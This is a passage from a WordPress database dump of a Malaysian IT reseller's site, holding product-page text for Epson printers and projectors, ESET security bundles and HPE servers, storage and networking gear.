tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson M1100 Printer</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>LASER PRINTER</h3>		\n		<p><strong>Epson AcuLaser C9300N</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<p>Â <strong>Epson WorkForce AL-M320DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson WorkForce AL-M8100DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2018-12-24 14:33:50','2018-12-24 06:33:50','',1486,'https://bintara.com.my/blog/2018/12/24/1486-revision-v1/',0,'revision','',0),(3543,1,'2019-09-30 11:14:19','2019-09-30 03:14:19','<h2><strong>Protecting you worldwide</strong></h2>\nESET is here to secure your computers and devices, protect your precious family pictures and data, or keep your company know-how safe. We protect users just like you across 200 countries and territories worldwide, helping them to use and explore all the great opportunities of the Internet. We are proud that so many individuals and companies trust us to secure their digital lives.\n\n&nbsp;\n<h2><strong>Efficient endpoint security for small businesses</strong></h2>\n<h3><strong>Manage network security via the cloud. NoÂ need for extra hardware</strong></h3>\nManage IT security conveniently using ESET Cloud Administrator.Â Benefit from a single-point overview of your network security. Receive notifications as incidents occur. React immediately from wherever you are.\n\n<img class=\"wp-image-2446 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/eset.png\" alt=\"\" width=\"291\" height=\"203\" />\n\n&nbsp;\n<ul>\n 	<li>All your network security management in one place</li>\n 	<li>Secure access via web browser</li>\n 	<li>Always the latest version â€“ updates automatically</li>\n 	<li>No need for extra hardware</li>\n</ul>\n\n&nbsp;\n<h2><strong>Bundled solutions for small size business</strong></h2>\n<ol>\n 	<li>\n<h4><strong>ESET Secure Business Cloud</strong></h4>\n</li>\n</ol>\nComplete bundled security solution for endpoints and file servers. Email-borne threats blocked at server level. Provides:\n<ul>\n 	<li>Protection against targeted attacks</li>\n 	<li>Protection against ransomware</li>\n 	<li>Prevention of fileless attacks</li>\n 	<li>Protection of email gateway</li>\n 	<li>Cloud-based remote management</li>\n</ul>\n<ol start=\"2\">\n 	<li>\n<h4><strong>ESET Endpoint Protection Advanced Cloud</strong></h4>\n</li>\n</ol>\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\n<ul>\n 	<li>Protection against targeted attacks</li>\n 	<li>Protection against ransomware</li>\n 	<li>Prevention of fileless attacks</li>\n 	<li>Cloud-based remote management</li>\n</ul>\n<ol start=\"3\">\n 	<li>\n<h4><strong>ESET Endpoint Protection Advanced</strong></h4>\n</li>\n</ol>\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\n<ul>\n 	<li>Protection against targeted attacks</li>\n 	<li>Protection against ransomware</li>\n 	<li>Prevention of fileless attacks</li>\n 	<li>Remote management</li>\n</ul>\n\n&nbsp;\n<h2><strong>Dynamic endpoint security for mid-size businesses</strong></h2>\n<h3><strong>Easy to use, single interface management of your endpoint security</strong></h3>\nESET Security Management Center provides a real-time overview of all your on-premise and off premise endpoints via an enterprise-grade console. Benefit from full reporting and security management for all operating systems.\n\n<img class=\"wp-image-2447 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/mid-size.png\" alt=\"\" width=\"269\" height=\"177\" />\n<ul>\n 	<li>Complete network visibility</li>\n 	<li>Full security management</li>\n 	<li>Flexible reporting</li>\n 	<li>Automated security management</li>\n</ul>\n\n&nbsp;\n<h2><strong>Bundled solutions for mid size business</strong></h2>\n<ol>\n 	<li>\n<h4><strong>ESET Secure Business</strong></h4>\n</li>\n</ol>\nComplete bundled security solution for endpoints and file servers. Email-borne threats blocked at server level. Provides:\n<ul>\n 	<li>Protection against targeted attacks</li>\n 	<li>Protection against ransomware</li>\n 	<li>Prevention of fileless attacks</li>\n 	<li>Protection of email gateway</li>\n 	<li>Remote management</li>\n</ul>\n<ol start=\"2\">\n 	<li>\n<h4><strong>ESET Dynamic Endpoint Protection</strong></h4>\n</li>\n</ol>\nEnterprise-grade award-winning ESET endpoint protection with cloud-based sandboxing technology. Incorporates behavior-based detection easily managed via a single online console. Provides:\n<ul>\n 	<li>Targeted attacks protection</li>\n 	<li>Advanced persistent threats detection</li>\n 	<li>Protection against ransomware</li>\n 	<li>Zero-day threats detection</li>\n 	<li>Remote management</li>\n</ul>\n<ol start=\"3\">\n 	<li>\n<h4><strong>ESET Endpoint Protection Advanced</strong></h4>\n</li>\n</ol>\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\n<ul>\n 	<li>Protection against targeted attacks</li>\n 	<li>Protection against ransomware</li>\n 	<li>Prevention of fileless attacks</li>\n 	<li>Remote management</li>\n</ul>\n\n&nbsp;\n<h2><strong>Future ready cybersecurity for enterprise</strong></h2>\n<h3><strong>Bundled solutions for enterprise</strong></h3>\nFits all security requirements. Flexible and scalable to any IT environment.\n<ol>\n 	<li>\n<h4><strong>ESET Elite Targeted Attack Protection</strong></h4>\n</li>\n</ol>\nFull-scale protection encompassing all ESETâ€™s latest technologies and services for eliminating all known and unknown threats. Includes:\n<ul>\n 	<li>Security Management Center</li>\n 	<li>Endpoint Protection Platform</li>\n 	<li>Cloud Sandbox Analysis</li>\n 	<li>Endpoint Detection &amp; Response</li>\n 	<li>Manual Malware Analysis</li>\n 	<li>Forensic Analysis &amp; Consulting</li>\n</ul>\n<ol start=\"2\">\n 	<li>\n<h4><strong>ESET Targeted Attack Protection</strong></h4>\n</li>\n</ol>\nComplete, seamless prevention, detection and response solution, incorporating total visibility, for remediation of any security issue in the network. Includes:\n<ul>\n 	<li>Security Management Center</li>\n 	<li>Endpoint Protection Platform</li>\n 	<li>Cloud Sandbox Analysis</li>\n 	<li>Endpoint Detection &amp; Response</li>\n</ul>\n<ol start=\"3\">\n 	<li>\n<h4><strong>ESET Dynamic Endpoint Protection</strong></h4>\n</li>\n</ol>\nComprehensive, easily managed protection, incorporating off-premise cloud sandboxing leveraging machine learning and behavior-based detection. Includes:\n<ul>\n 	<li>Security Management Center</li>\n 	<li>Endpoint Protection Platform</li>\n 	<li>Cloud Sandbox Analysis</li>\n</ul>\n<ol start=\"4\">\n 	<li>\n<h4><strong>ESET Endpoint Protection Advanced</strong></h4>\n</li>\n</ol>\nMultilayered protection utilizing multiple technologies and incorporating visibility management and reporting across all operating systems. Includes:\n<ul>\n 	<li>Security Management Center</li>\n 	<li>Endpoint Protection Platform</li>\n</ul>\n<ol start=\"5\">\n 	<li>\n<h4><strong>ESET Dynamic Mail Protection</strong></h4>\n</li>\n</ol>\nBusiness solution incorporating antispam, anti-phishing and Cloud Sandbox Analysis for the complete protection of mailboxes and mail servers. Includes:\n<ul>\n 	<li>Security Management Center</li>\n 	<li>Cloud Sandbox Analysis</li>\n 	<li>Mail Security</li>\n</ul>\n<ol start=\"6\">\n 	<li>\n<h4><strong>ESET Identity &amp; Data Protection</strong></h4>\n</li>\n</ol>\nBusiness solution for superior and enhanced protection of an organizationâ€™s data and intellectual property. Includes:\n<ul>\n 	<li>Two-factor Authentication</li>\n 	<li>Endpoint Encryption</li>\n</ul>\nTo discover more, please click the button below or contact us to discuss your needs.\n\n&nbsp;\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\n&nbsp;','ESET','','inherit','closed','closed','','1477-autosave-v1','','','2019-09-30 11:14:19','2019-09-30 03:14:19','',1477,'https://bintara.com.my/blog/2019/09/30/1477-autosave-v1/',0,'revision','',0),(2765,1,'2018-12-24 15:27:44','2018-12-24 07:27:44','[vfb id=11]','Get Quotation (HPE)','','publish','closed','closed','','get-quotation-hpe','','','2018-12-24 15:27:44','2018-12-24 07:27:44','',0,'https://bintara.com.my/?page_id=2765',0,'page','',0),(2766,1,'2018-12-24 15:27:44','2018-12-24 07:27:44','[vfb id=11]','Get Quotation (HPE)','','inherit','closed','closed','','2765-revision-v1','','','2018-12-24 15:27:44','2018-12-24 07:27:44','',2765,'https://bintara.com.my/blog/2018/12/24/2765-revision-v1/',0,'revision','',0),(3629,1,'2019-10-01 15:58:20','2019-10-01 07:58:20','<h2>SERVER AND SYSTEM</h2><h2 style=\"text-align: center;\"><strong>Rack Servers</strong></h2><p style=\"text-align: center;\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL325 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL325-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Secure and versatile single socket (1P) 1U AMD EPYCâ„¢ based platform offers an exceptional balance of processor, memory and I/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL385 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL385-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.</p><h4 style=\"text-align: center;\"><strong>HPE Apollo 6000 Chassis</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Apollo-6000-Chassis.png\" alt=\"\" width=\"202\" height=\"151\" /></p><p style=\"text-align: center;\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customerâ€™s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Tower Servers</strong></h2><p style=\"text-align: center;\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.</p><p>Â </p><ul><li><strong>HPE ProLiant ML110 Gen10 Server</strong></li></ul><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML110-Gen10-Server.png\" alt=\"\" width=\"226\" height=\"169\" /></p><p>The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businessesâ€™ needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.</p><p><strong>[maxbutton id=\"13\"]</strong></p><ul><li><strong>HPE ProLiant ML350 Gen10 Server</strong></li></ul><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML350-Gen10-Server.png\" alt=\"\" width=\"201\" height=\"150\" /></p><p>HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.Â The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.</p><p><strong>[maxbutton id=\"13\"]</strong></p><p>3.Â <strong>HPE Synergy</strong></p><p>Composable, software-defined infrastructure that speeds application delivery.</p><ul><li><strong>HPE Synergy 12000 Frame</strong></li></ul><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-12000-Frame.png\" alt=\"\" width=\"226\" height=\"170\" /></p><p>HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.</p><p><strong>[maxbutton id=\"13\"]</strong></p><ul><li><strong>HPE Synergy D3940 Storage Module</strong></li></ul><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-D3940-Storage-Module.png\" alt=\"\" width=\"222\" height=\"166\" /></p><p>The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.</p><p><strong>[maxbutton id=\"13\"]</strong></p><h2>DATA STORAGE</h2><p>Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.</p><ul><li><strong>HPE StoreOnce Systems</strong></li></ul><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-StoreOnce-Systems.png\" alt=\"\" width=\"208\" height=\"156\" /></p><p>HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.</p><p><strong>[maxbutton id=\"13\"]</strong></p><ul><li><strong>HPE 3PAR StoreServ 8000 Storage</strong></li></ul><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-8000-Storage.png\" alt=\"\" width=\"208\" height=\"156\" /></p><p>HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesnâ€™t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.</p><p><strong>[maxbutton id=\"13\"]</strong></p><ul><li><strong>HPE 3PAR StoreServ 9000 Storage</strong></li></ul><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-9000-Storage.png\" alt=\"\" width=\"189\" height=\"142\" /></p><p>HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads â€“ for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.</p><p><strong>[maxbutton id=\"13\"]</strong></p><h2>NETWORKING</h2><ol><li><strong>Router</strong></li></ol><p>Navigate more devices and simplify complex networks with intelligent management of open standards routing.</p><ul><li><strong>HPE FLexNetwork MSR95x Router Series</strong></li></ul><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FLexNetwork-MSR95x-Router-Series.png\" alt=\"\" width=\"227\" height=\"171\" /></p><p>HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With 